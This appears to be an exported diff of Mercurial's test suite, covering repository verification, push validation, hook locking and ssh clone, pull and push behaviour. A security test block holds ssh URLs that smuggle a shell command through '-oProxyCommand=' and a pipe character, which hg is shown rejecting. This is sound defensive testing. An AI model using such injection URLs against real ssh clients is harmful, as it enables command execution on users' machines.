189 checking changesets
190 checking manifests
190 checking manifests
191 crosschecking files in changesets and manifests
191 crosschecking files in changesets and manifests
192 checking files
192 checking files
193 beta@1: dddc47b3ba30 not in manifests
193 beta@1: dddc47b3ba30 not in manifests
194 2 files, 2 changesets, 4 total revisions
194 2 files, 2 changesets, 4 total revisions
195 1 integrity errors encountered!
195 1 integrity errors encountered!
196 (first damaged changeset appears to be 1)
196 (first damaged changeset appears to be 1)
197 [1]
197 [1]
198
198
199 $ hg push
199 $ hg push
200 pushing to $TESTTMP/test-validation (glob)
200 pushing to $TESTTMP/test-validation (glob)
201 searching for changes
201 searching for changes
202 adding changesets
202 adding changesets
203 adding manifests
203 adding manifests
204 adding file changes
204 adding file changes
205 transaction abort!
205 transaction abort!
206 rollback completed
206 rollback completed
207 abort: received spurious file revlog entry
207 abort: received spurious file revlog entry
208 [255]
208 [255]
209
209
210 $ hg -q rollback
210 $ hg -q rollback
211 $ mv tmp1 .hg/store/data/beta.i
211 $ mv tmp1 .hg/store/data/beta.i
212 $ echo beta > beta
212 $ echo beta > beta
213
213
214 Test missing filelog entries:
214 Test missing filelog entries:
215
215
216 $ cp .hg/store/data/beta.i tmp
216 $ cp .hg/store/data/beta.i tmp
217 $ echo blah >> beta
217 $ echo blah >> beta
218 $ hg ci -m '2 (corrupt)'
218 $ hg ci -m '2 (corrupt)'
219 $ mv tmp .hg/store/data/beta.i
219 $ mv tmp .hg/store/data/beta.i
220
220
221 Expected to fail:
221 Expected to fail:
222
222
223 $ hg verify
223 $ hg verify
224 checking changesets
224 checking changesets
225 checking manifests
225 checking manifests
226 crosschecking files in changesets and manifests
226 crosschecking files in changesets and manifests
227 checking files
227 checking files
228 beta@1: manifest refers to unknown revision dddc47b3ba30
228 beta@1: manifest refers to unknown revision dddc47b3ba30
229 2 files, 2 changesets, 2 total revisions
229 2 files, 2 changesets, 2 total revisions
230 1 integrity errors encountered!
230 1 integrity errors encountered!
231 (first damaged changeset appears to be 1)
231 (first damaged changeset appears to be 1)
232 [1]
232 [1]
233
233
234 $ hg push
234 $ hg push
235 pushing to $TESTTMP/test-validation (glob)
235 pushing to $TESTTMP/test-validation (glob)
236 searching for changes
236 searching for changes
237 adding changesets
237 adding changesets
238 adding manifests
238 adding manifests
239 adding file changes
239 adding file changes
240 transaction abort!
240 transaction abort!
241 rollback completed
241 rollback completed
242 abort: missing file data for beta:dddc47b3ba30e54484720ce0f4f768a0f4b6efb9 - run hg verify
242 abort: missing file data for beta:dddc47b3ba30e54484720ce0f4f768a0f4b6efb9 - run hg verify
243 [255]
243 [255]
244
244
245 $ cd ..
245 $ cd ..
246
246
247 Test push hook locking
247 Test push hook locking
248 =====================
248 =====================
249
249
250 $ hg init 1
250 $ hg init 1
251
251
252 $ echo '[ui]' >> 1/.hg/hgrc
252 $ echo '[ui]' >> 1/.hg/hgrc
253 $ echo 'timeout = 10' >> 1/.hg/hgrc
253 $ echo 'timeout = 10' >> 1/.hg/hgrc
254
254
255 $ echo foo > 1/foo
255 $ echo foo > 1/foo
256 $ hg --cwd 1 ci -A -m foo
256 $ hg --cwd 1 ci -A -m foo
257 adding foo
257 adding foo
258
258
259 $ hg clone 1 2
259 $ hg clone 1 2
260 updating to branch default
260 updating to branch default
261 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
261 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
262
262
263 $ hg clone 2 3
263 $ hg clone 2 3
264 updating to branch default
264 updating to branch default
265 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
265 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
266
266
267 $ cat <<EOF > $TESTTMP/debuglocks-pretxn-hook.sh
267 $ cat <<EOF > $TESTTMP/debuglocks-pretxn-hook.sh
268 > hg debuglocks
268 > hg debuglocks
269 > true
269 > true
270 > EOF
270 > EOF
271 $ echo '[hooks]' >> 2/.hg/hgrc
271 $ echo '[hooks]' >> 2/.hg/hgrc
272 $ echo "pretxnchangegroup.a = sh $TESTTMP/debuglocks-pretxn-hook.sh" >> 2/.hg/hgrc
272 $ echo "pretxnchangegroup.a = sh $TESTTMP/debuglocks-pretxn-hook.sh" >> 2/.hg/hgrc
273 $ echo 'changegroup.push = hg push -qf ../1' >> 2/.hg/hgrc
273 $ echo 'changegroup.push = hg push -qf ../1' >> 2/.hg/hgrc
274
274
275 $ echo bar >> 3/foo
275 $ echo bar >> 3/foo
276 $ hg --cwd 3 ci -m bar
276 $ hg --cwd 3 ci -m bar
277
277
278 $ hg --cwd 3 push ../2 --config devel.legacy.exchange=bundle1
278 $ hg --cwd 3 push ../2 --config devel.legacy.exchange=bundle1
279 pushing to ../2
279 pushing to ../2
280 searching for changes
280 searching for changes
281 adding changesets
281 adding changesets
282 adding manifests
282 adding manifests
283 adding file changes
283 adding file changes
284 added 1 changesets with 1 changes to 1 files
284 added 1 changesets with 1 changes to 1 files
285 lock: user *, process * (*s) (glob)
285 lock: user *, process * (*s) (glob)
286 wlock: free
286 wlock: free
287
287
288 $ hg --cwd 1 --config extensions.strip= strip tip -q
288 $ hg --cwd 1 --config extensions.strip= strip tip -q
289 $ hg --cwd 2 --config extensions.strip= strip tip -q
289 $ hg --cwd 2 --config extensions.strip= strip tip -q
290 $ hg --cwd 3 push ../2 # bundle2+
290 $ hg --cwd 3 push ../2 # bundle2+
291 pushing to ../2
291 pushing to ../2
292 searching for changes
292 searching for changes
293 adding changesets
293 adding changesets
294 adding manifests
294 adding manifests
295 adding file changes
295 adding file changes
296 added 1 changesets with 1 changes to 1 files
296 added 1 changesets with 1 changes to 1 files
297 lock: user *, process * (*s) (glob)
297 lock: user *, process * (*s) (glob)
298 wlock: user *, process * (*s) (glob)
298 wlock: user *, process * (*s) (glob)
299
299
300 Test bare push with multiple race checking options
300 Test bare push with multiple race checking options
301 --------------------------------------------------
301 --------------------------------------------------
302
302
303 $ hg init test-bare-push-no-concurrency
303 $ hg init test-bare-push-no-concurrency
304 $ hg init test-bare-push-unrelated-concurrency
304 $ hg init test-bare-push-unrelated-concurrency
305 $ hg -R test-revflag push -r 0 test-bare-push-no-concurrency --config server.concurrent-push-mode=strict
305 $ hg -R test-revflag push -r 0 test-bare-push-no-concurrency --config server.concurrent-push-mode=strict
306 pushing to test-bare-push-no-concurrency
306 pushing to test-bare-push-no-concurrency
307 searching for changes
307 searching for changes
308 adding changesets
308 adding changesets
309 adding manifests
309 adding manifests
310 adding file changes
310 adding file changes
311 added 1 changesets with 1 changes to 1 files
311 added 1 changesets with 1 changes to 1 files
312 $ hg -R test-revflag push -r 0 test-bare-push-unrelated-concurrency --config server.concurrent-push-mode=check-related
312 $ hg -R test-revflag push -r 0 test-bare-push-unrelated-concurrency --config server.concurrent-push-mode=check-related
313 pushing to test-bare-push-unrelated-concurrency
313 pushing to test-bare-push-unrelated-concurrency
314 searching for changes
314 searching for changes
315 adding changesets
315 adding changesets
316 adding manifests
316 adding manifests
317 adding file changes
317 adding file changes
318 added 1 changesets with 1 changes to 1 files
318 added 1 changesets with 1 changes to 1 files
319
320 SEC: check for unsafe ssh url
321
322 $ cat >> $HGRCPATH << EOF
323 > [ui]
324 > ssh = sh -c "read l; read l; read l"
325 > EOF
326
327 $ hg -R test-revflag push 'ssh://-oProxyCommand=touch${IFS}owned/path'
328 pushing to ssh://-oProxyCommand%3Dtouch%24%7BIFS%7Downed/path
329 abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path'
330 [255]
331 $ hg -R test-revflag push 'ssh://%2DoProxyCommand=touch${IFS}owned/path'
332 pushing to ssh://-oProxyCommand%3Dtouch%24%7BIFS%7Downed/path
333 abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path'
334 [255]
335 $ hg -R test-revflag push 'ssh://fakehost|touch${IFS}owned/path'
336 pushing to ssh://fakehost%7Ctouch%24%7BIFS%7Downed/path
337 abort: no suitable response from remote hg!
338 [255]
339 $ hg -R test-revflag push 'ssh://fakehost%7Ctouch%20owned/path'
340 pushing to ssh://fakehost%7Ctouch%20owned/path
341 abort: no suitable response from remote hg!
342 [255]
343
344 $ [ ! -f owned ] || echo 'you got owned'
@@ -1,562 +1,562 b''
1 This test is a duplicate of 'test-http.t' feel free to factor out
1 This test is a duplicate of 'test-http.t' feel free to factor out
2 parts that are not bundle1/bundle2 specific.
2 parts that are not bundle1/bundle2 specific.
3
3
4 $ cat << EOF >> $HGRCPATH
4 $ cat << EOF >> $HGRCPATH
5 > [devel]
5 > [devel]
6 > # This test is dedicated to interaction through old bundle
6 > # This test is dedicated to interaction through old bundle
7 > legacy.exchange = bundle1
7 > legacy.exchange = bundle1
8 > [format] # temporary settings
8 > [format] # temporary settings
9 > usegeneraldelta=yes
9 > usegeneraldelta=yes
10 > EOF
10 > EOF
11
11
12
12
13 This test tries to exercise the ssh functionality with a dummy script
13 This test tries to exercise the ssh functionality with a dummy script
14
14
15 creating 'remote' repo
15 creating 'remote' repo
16
16
17 $ hg init remote
17 $ hg init remote
18 $ cd remote
18 $ cd remote
19 $ echo this > foo
19 $ echo this > foo
20 $ echo this > fooO
20 $ echo this > fooO
21 $ hg ci -A -m "init" foo fooO
21 $ hg ci -A -m "init" foo fooO
22
22
23 insert a closed branch (issue4428)
23 insert a closed branch (issue4428)
24
24
25 $ hg up null
25 $ hg up null
26 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
26 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
27 $ hg branch closed
27 $ hg branch closed
28 marked working directory as branch closed
28 marked working directory as branch closed
29 (branches are permanent and global, did you want a bookmark?)
29 (branches are permanent and global, did you want a bookmark?)
30 $ hg ci -mc0
30 $ hg ci -mc0
31 $ hg ci --close-branch -mc1
31 $ hg ci --close-branch -mc1
32 $ hg up -q default
32 $ hg up -q default
33
33
34 configure for serving
34 configure for serving
35
35
36 $ cat <<EOF > .hg/hgrc
36 $ cat <<EOF > .hg/hgrc
37 > [server]
37 > [server]
38 > uncompressed = True
38 > uncompressed = True
39 >
39 >
40 > [hooks]
40 > [hooks]
41 > changegroup = sh -c "printenv.py changegroup-in-remote 0 ../dummylog"
41 > changegroup = sh -c "printenv.py changegroup-in-remote 0 ../dummylog"
42 > EOF
42 > EOF
43 $ cd ..
43 $ cd ..
44
44
45 repo not found error
45 repo not found error
46
46
47 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/nonexistent local
47 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/nonexistent local
48 remote: abort: repository nonexistent not found!
48 remote: abort: repository nonexistent not found!
49 abort: no suitable response from remote hg!
49 abort: no suitable response from remote hg!
50 [255]
50 [255]
51
51
52 non-existent absolute path
52 non-existent absolute path
53
53
54 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy//`pwd`/nonexistent local
54 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy//`pwd`/nonexistent local
55 remote: abort: repository /$TESTTMP/nonexistent not found!
55 remote: abort: repository /$TESTTMP/nonexistent not found!
56 abort: no suitable response from remote hg!
56 abort: no suitable response from remote hg!
57 [255]
57 [255]
58
58
59 clone remote via stream
59 clone remote via stream
60
60
61 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --uncompressed ssh://user@dummy/remote local-stream
61 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --uncompressed ssh://user@dummy/remote local-stream
62 streaming all changes
62 streaming all changes
63 4 files to transfer, 602 bytes of data
63 4 files to transfer, 602 bytes of data
64 transferred 602 bytes in * seconds (*) (glob)
64 transferred 602 bytes in * seconds (*) (glob)
65 searching for changes
65 searching for changes
66 no changes found
66 no changes found
67 updating to branch default
67 updating to branch default
68 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
68 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
69 $ cd local-stream
69 $ cd local-stream
70 $ hg verify
70 $ hg verify
71 checking changesets
71 checking changesets
72 checking manifests
72 checking manifests
73 crosschecking files in changesets and manifests
73 crosschecking files in changesets and manifests
74 checking files
74 checking files
75 2 files, 3 changesets, 2 total revisions
75 2 files, 3 changesets, 2 total revisions
76 $ hg branches
76 $ hg branches
77 default 0:1160648e36ce
77 default 0:1160648e36ce
78 $ cd ..
78 $ cd ..
79
79
80 clone bookmarks via stream
80 clone bookmarks via stream
81
81
82 $ hg -R local-stream book mybook
82 $ hg -R local-stream book mybook
83 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --uncompressed ssh://user@dummy/local-stream stream2
83 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --uncompressed ssh://user@dummy/local-stream stream2
84 streaming all changes
84 streaming all changes
85 4 files to transfer, 602 bytes of data
85 4 files to transfer, 602 bytes of data
86 transferred 602 bytes in * seconds (*) (glob)
86 transferred 602 bytes in * seconds (*) (glob)
87 searching for changes
87 searching for changes
88 no changes found
88 no changes found
89 updating to branch default
89 updating to branch default
90 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
90 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
91 $ cd stream2
91 $ cd stream2
92 $ hg book
92 $ hg book
93 mybook 0:1160648e36ce
93 mybook 0:1160648e36ce
94 $ cd ..
94 $ cd ..
95 $ rm -rf local-stream stream2
95 $ rm -rf local-stream stream2
96
96
97 clone remote via pull
97 clone remote via pull
98
98
99 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote local
99 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote local
100 requesting all changes
100 requesting all changes
101 adding changesets
101 adding changesets
102 adding manifests
102 adding manifests
103 adding file changes
103 adding file changes
104 added 3 changesets with 2 changes to 2 files
104 added 3 changesets with 2 changes to 2 files
105 updating to branch default
105 updating to branch default
106 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
106 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
107
107
108 verify
108 verify
109
109
110 $ cd local
110 $ cd local
111 $ hg verify
111 $ hg verify
112 checking changesets
112 checking changesets
113 checking manifests
113 checking manifests
114 crosschecking files in changesets and manifests
114 crosschecking files in changesets and manifests
115 checking files
115 checking files
116 2 files, 3 changesets, 2 total revisions
116 2 files, 3 changesets, 2 total revisions
117 $ cat >> .hg/hgrc <<EOF
117 $ cat >> .hg/hgrc <<EOF
118 > [hooks]
118 > [hooks]
119 > changegroup = sh -c "printenv.py changegroup-in-local 0 ../dummylog"
119 > changegroup = sh -c "printenv.py changegroup-in-local 0 ../dummylog"
120 > EOF
120 > EOF
121
121
122 empty default pull
122 empty default pull
123
123
124 $ hg paths
124 $ hg paths
125 default = ssh://user@dummy/remote
125 default = ssh://user@dummy/remote
126 $ hg pull -e "\"$PYTHON\" \"$TESTDIR/dummyssh\""
126 $ hg pull -e "\"$PYTHON\" \"$TESTDIR/dummyssh\""
127 pulling from ssh://user@dummy/remote
127 pulling from ssh://user@dummy/remote
128 searching for changes
128 searching for changes
129 no changes found
129 no changes found
130
130
131 pull from wrong ssh URL
131 pull from wrong ssh URL
132
132
133 $ hg pull -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/doesnotexist
133 $ hg pull -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/doesnotexist
134 pulling from ssh://user@dummy/doesnotexist
134 pulling from ssh://user@dummy/doesnotexist
135 remote: abort: repository doesnotexist not found!
135 remote: abort: repository doesnotexist not found!
136 abort: no suitable response from remote hg!
136 abort: no suitable response from remote hg!
137 [255]
137 [255]
138
138
139 local change
139 local change
140
140
141 $ echo bleah > foo
141 $ echo bleah > foo
142 $ hg ci -m "add"
142 $ hg ci -m "add"
143
143
144 updating rc
144 updating rc
145
145
146 $ echo "default-push = ssh://user@dummy/remote" >> .hg/hgrc
146 $ echo "default-push = ssh://user@dummy/remote" >> .hg/hgrc
147 $ echo "[ui]" >> .hg/hgrc
147 $ echo "[ui]" >> .hg/hgrc
148 $ echo "ssh = \"$PYTHON\" \"$TESTDIR/dummyssh\"" >> .hg/hgrc
148 $ echo "ssh = \"$PYTHON\" \"$TESTDIR/dummyssh\"" >> .hg/hgrc
149
149
150 find outgoing
150 find outgoing
151
151
152 $ hg out ssh://user@dummy/remote
152 $ hg out ssh://user@dummy/remote
153 comparing with ssh://user@dummy/remote
153 comparing with ssh://user@dummy/remote
154 searching for changes
154 searching for changes
155 changeset: 3:a28a9d1a809c
155 changeset: 3:a28a9d1a809c
156 tag: tip
156 tag: tip
157 parent: 0:1160648e36ce
157 parent: 0:1160648e36ce
158 user: test
158 user: test
159 date: Thu Jan 01 00:00:00 1970 +0000
159 date: Thu Jan 01 00:00:00 1970 +0000
160 summary: add
160 summary: add
161
161
162
162
163 find incoming on the remote side
163 find incoming on the remote side
164
164
165 $ hg incoming -R ../remote -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/local
165 $ hg incoming -R ../remote -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/local
166 comparing with ssh://user@dummy/local
166 comparing with ssh://user@dummy/local
167 searching for changes
167 searching for changes
168 changeset: 3:a28a9d1a809c
168 changeset: 3:a28a9d1a809c
169 tag: tip
169 tag: tip
170 parent: 0:1160648e36ce
170 parent: 0:1160648e36ce
171 user: test
171 user: test
172 date: Thu Jan 01 00:00:00 1970 +0000
172 date: Thu Jan 01 00:00:00 1970 +0000
173 summary: add
173 summary: add
174
174
175
175
176 find incoming on the remote side (using absolute path)
176 find incoming on the remote side (using absolute path)
177
177
178 $ hg incoming -R ../remote -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/`pwd`"
178 $ hg incoming -R ../remote -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/`pwd`"
179 comparing with ssh://user@dummy/$TESTTMP/local
179 comparing with ssh://user@dummy/$TESTTMP/local
180 searching for changes
180 searching for changes
181 changeset: 3:a28a9d1a809c
181 changeset: 3:a28a9d1a809c
182 tag: tip
182 tag: tip
183 parent: 0:1160648e36ce
183 parent: 0:1160648e36ce
184 user: test
184 user: test
185 date: Thu Jan 01 00:00:00 1970 +0000
185 date: Thu Jan 01 00:00:00 1970 +0000
186 summary: add
186 summary: add
187
187
188
188
189 push
189 push
190
190
191 $ hg push
191 $ hg push
192 pushing to ssh://user@dummy/remote
192 pushing to ssh://user@dummy/remote
193 searching for changes
193 searching for changes
194 remote: adding changesets
194 remote: adding changesets
195 remote: adding manifests
195 remote: adding manifests
196 remote: adding file changes
196 remote: adding file changes
197 remote: added 1 changesets with 1 changes to 1 files
197 remote: added 1 changesets with 1 changes to 1 files
198 $ cd ../remote
198 $ cd ../remote
199
199
200 check remote tip
200 check remote tip
201
201
202 $ hg tip
202 $ hg tip
203 changeset: 3:a28a9d1a809c
203 changeset: 3:a28a9d1a809c
204 tag: tip
204 tag: tip
205 parent: 0:1160648e36ce
205 parent: 0:1160648e36ce
206 user: test
206 user: test
207 date: Thu Jan 01 00:00:00 1970 +0000
207 date: Thu Jan 01 00:00:00 1970 +0000
208 summary: add
208 summary: add
209
209
210 $ hg verify
210 $ hg verify
211 checking changesets
211 checking changesets
212 checking manifests
212 checking manifests
213 crosschecking files in changesets and manifests
213 crosschecking files in changesets and manifests
214 checking files
214 checking files
215 2 files, 4 changesets, 3 total revisions
215 2 files, 4 changesets, 3 total revisions
216 $ hg cat -r tip foo
216 $ hg cat -r tip foo
217 bleah
217 bleah
218 $ echo z > z
218 $ echo z > z
219 $ hg ci -A -m z z
219 $ hg ci -A -m z z
220 created new head
220 created new head
221
221
222 test pushkeys and bookmarks
222 test pushkeys and bookmarks
223
223
224 $ cd ../local
224 $ cd ../local
225 $ hg debugpushkey --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote namespaces
225 $ hg debugpushkey --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote namespaces
226 bookmarks
226 bookmarks
227 namespaces
227 namespaces
228 phases
228 phases
229 $ hg book foo -r 0
229 $ hg book foo -r 0
230 $ hg out -B
230 $ hg out -B
231 comparing with ssh://user@dummy/remote
231 comparing with ssh://user@dummy/remote
232 searching for changed bookmarks
232 searching for changed bookmarks
233 foo 1160648e36ce
233 foo 1160648e36ce
234 $ hg push -B foo
234 $ hg push -B foo
235 pushing to ssh://user@dummy/remote
235 pushing to ssh://user@dummy/remote
236 searching for changes
236 searching for changes
237 no changes found
237 no changes found
238 exporting bookmark foo
238 exporting bookmark foo
239 [1]
239 [1]
240 $ hg debugpushkey --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote bookmarks
240 $ hg debugpushkey --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote bookmarks
241 foo 1160648e36cec0054048a7edc4110c6f84fde594
241 foo 1160648e36cec0054048a7edc4110c6f84fde594
242 $ hg book -f foo
242 $ hg book -f foo
243 $ hg push --traceback
243 $ hg push --traceback
244 pushing to ssh://user@dummy/remote
244 pushing to ssh://user@dummy/remote
245 searching for changes
245 searching for changes
246 no changes found
246 no changes found
247 updating bookmark foo
247 updating bookmark foo
248 [1]
248 [1]
249 $ hg book -d foo
249 $ hg book -d foo
250 $ hg in -B
250 $ hg in -B
251 comparing with ssh://user@dummy/remote
251 comparing with ssh://user@dummy/remote
252 searching for changed bookmarks
252 searching for changed bookmarks
253 foo a28a9d1a809c
253 foo a28a9d1a809c
254 $ hg book -f -r 0 foo
254 $ hg book -f -r 0 foo
255 $ hg pull -B foo
255 $ hg pull -B foo
256 pulling from ssh://user@dummy/remote
256 pulling from ssh://user@dummy/remote
257 no changes found
257 no changes found
258 updating bookmark foo
258 updating bookmark foo
259 $ hg book -d foo
259 $ hg book -d foo
260 $ hg push -B foo
260 $ hg push -B foo
261 pushing to ssh://user@dummy/remote
261 pushing to ssh://user@dummy/remote
262 searching for changes
262 searching for changes
263 no changes found
263 no changes found
264 deleting remote bookmark foo
264 deleting remote bookmark foo
265 [1]
265 [1]
266
266
267 a bad, evil hook that prints to stdout
267 a bad, evil hook that prints to stdout
268
268
269 $ cat <<EOF > $TESTTMP/badhook
269 $ cat <<EOF > $TESTTMP/badhook
270 > import sys
270 > import sys
271 > sys.stdout.write("KABOOM\n")
271 > sys.stdout.write("KABOOM\n")
272 > EOF
272 > EOF
273
273
274 $ echo '[hooks]' >> ../remote/.hg/hgrc
274 $ echo '[hooks]' >> ../remote/.hg/hgrc
275 $ echo "changegroup.stdout = \"$PYTHON\" $TESTTMP/badhook" >> ../remote/.hg/hgrc
275 $ echo "changegroup.stdout = \"$PYTHON\" $TESTTMP/badhook" >> ../remote/.hg/hgrc
276 $ echo r > r
276 $ echo r > r
277 $ hg ci -A -m z r
277 $ hg ci -A -m z r
278
278
279 push should succeed even though it has an unexpected response
279 push should succeed even though it has an unexpected response
280
280
281 $ hg push
281 $ hg push
282 pushing to ssh://user@dummy/remote
282 pushing to ssh://user@dummy/remote
283 searching for changes
283 searching for changes
284 remote has heads on branch 'default' that are not known locally: 6c0482d977a3
284 remote has heads on branch 'default' that are not known locally: 6c0482d977a3
285 remote: adding changesets
285 remote: adding changesets
286 remote: adding manifests
286 remote: adding manifests
287 remote: adding file changes
287 remote: adding file changes
288 remote: added 1 changesets with 1 changes to 1 files
288 remote: added 1 changesets with 1 changes to 1 files
289 remote: KABOOM
289 remote: KABOOM
290 $ hg -R ../remote heads
290 $ hg -R ../remote heads
291 changeset: 5:1383141674ec
291 changeset: 5:1383141674ec
292 tag: tip
292 tag: tip
293 parent: 3:a28a9d1a809c
293 parent: 3:a28a9d1a809c
294 user: test
294 user: test
295 date: Thu Jan 01 00:00:00 1970 +0000
295 date: Thu Jan 01 00:00:00 1970 +0000
296 summary: z
296 summary: z
297
297
298 changeset: 4:6c0482d977a3
298 changeset: 4:6c0482d977a3
299 parent: 0:1160648e36ce
299 parent: 0:1160648e36ce
300 user: test
300 user: test
301 date: Thu Jan 01 00:00:00 1970 +0000
301 date: Thu Jan 01 00:00:00 1970 +0000
302 summary: z
302 summary: z
303
303
304
304
305 clone bookmarks
305 clone bookmarks
306
306
307 $ hg -R ../remote bookmark test
307 $ hg -R ../remote bookmark test
308 $ hg -R ../remote bookmarks
308 $ hg -R ../remote bookmarks
309 * test 4:6c0482d977a3
309 * test 4:6c0482d977a3
310 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote local-bookmarks
310 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote local-bookmarks
311 requesting all changes
311 requesting all changes
312 adding changesets
312 adding changesets
313 adding manifests
313 adding manifests
314 adding file changes
314 adding file changes
315 added 6 changesets with 5 changes to 4 files (+1 heads)
315 added 6 changesets with 5 changes to 4 files (+1 heads)
316 updating to branch default
316 updating to branch default
317 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
317 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
318 $ hg -R local-bookmarks bookmarks
318 $ hg -R local-bookmarks bookmarks
319 test 4:6c0482d977a3
319 test 4:6c0482d977a3
320
320
321 passwords in ssh urls are not supported
321 passwords in ssh urls are not supported
322 (we use a glob here because different Python versions give different
322 (we use a glob here because different Python versions give different
323 results here)
323 results here)
324
324
325 $ hg push ssh://user:erroneouspwd@dummy/remote
325 $ hg push ssh://user:erroneouspwd@dummy/remote
326 pushing to ssh://user:*@dummy/remote (glob)
326 pushing to ssh://user:*@dummy/remote (glob)
327 abort: password in URL not supported!
327 abort: password in URL not supported!
328 [255]
328 [255]
329
329
330 $ cd ..
330 $ cd ..
331
331
332 hide outer repo
332 hide outer repo
333 $ hg init
333 $ hg init
334
334
335 Test remote paths with spaces (issue2983):
335 Test remote paths with spaces (issue2983):
336
336
337 $ hg init --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
337 $ hg init --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
338 $ touch "$TESTTMP/a repo/test"
338 $ touch "$TESTTMP/a repo/test"
339 $ hg -R 'a repo' commit -A -m "test"
339 $ hg -R 'a repo' commit -A -m "test"
340 adding test
340 adding test
341 $ hg -R 'a repo' tag tag
341 $ hg -R 'a repo' tag tag
342 $ hg id --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
342 $ hg id --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
343 73649e48688a
343 73649e48688a
344
344
345 $ hg id --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo#noNoNO"
345 $ hg id --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo#noNoNO"
346 abort: unknown revision 'noNoNO'!
346 abort: unknown revision 'noNoNO'!
347 [255]
347 [255]
348
348
349 Test (non-)escaping of remote paths with spaces when cloning (issue3145):
349 Test (non-)escaping of remote paths with spaces when cloning (issue3145):
350
350
351 $ hg clone --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
351 $ hg clone --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
352 destination directory: a repo
352 destination directory: a repo
353 abort: destination 'a repo' is not empty
353 abort: destination 'a repo' is not empty
354 [255]
354 [255]
355
355
356 Test hg-ssh using a helper script that will restore PYTHONPATH (which might
356 Test hg-ssh using a helper script that will restore PYTHONPATH (which might
357 have been cleared by a hg.exe wrapper) and invoke hg-ssh with the right
357 have been cleared by a hg.exe wrapper) and invoke hg-ssh with the right
358 parameters:
358 parameters:
359
359
360 $ cat > ssh.sh << EOF
360 $ cat > ssh.sh << EOF
361 > userhost="\$1"
361 > userhost="\$1"
362 > SSH_ORIGINAL_COMMAND="\$2"
362 > SSH_ORIGINAL_COMMAND="\$2"
363 > export SSH_ORIGINAL_COMMAND
363 > export SSH_ORIGINAL_COMMAND
364 > PYTHONPATH="$PYTHONPATH"
364 > PYTHONPATH="$PYTHONPATH"
365 > export PYTHONPATH
365 > export PYTHONPATH
366 > "$PYTHON" "$TESTDIR/../contrib/hg-ssh" "$TESTTMP/a repo"
366 > "$PYTHON" "$TESTDIR/../contrib/hg-ssh" "$TESTTMP/a repo"
367 > EOF
367 > EOF
368
368
369 $ hg id --ssh "sh ssh.sh" "ssh://user@dummy/a repo"
369 $ hg id --ssh "sh ssh.sh" "ssh://user@dummy/a repo"
370 73649e48688a
370 73649e48688a
371
371
372 $ hg id --ssh "sh ssh.sh" "ssh://user@dummy/a'repo"
372 $ hg id --ssh "sh ssh.sh" "ssh://user@dummy/a'repo"
373 remote: Illegal repository "$TESTTMP/a'repo" (glob)
373 remote: Illegal repository "$TESTTMP/a'repo" (glob)
374 abort: no suitable response from remote hg!
374 abort: no suitable response from remote hg!
375 [255]
375 [255]
376
376
377 $ hg id --ssh "sh ssh.sh" --remotecmd hacking "ssh://user@dummy/a'repo"
377 $ hg id --ssh "sh ssh.sh" --remotecmd hacking "ssh://user@dummy/a'repo"
378 remote: Illegal command "hacking -R 'a'\''repo' serve --stdio"
378 remote: Illegal command "hacking -R 'a'\''repo' serve --stdio"
379 abort: no suitable response from remote hg!
379 abort: no suitable response from remote hg!
380 [255]
380 [255]
381
381
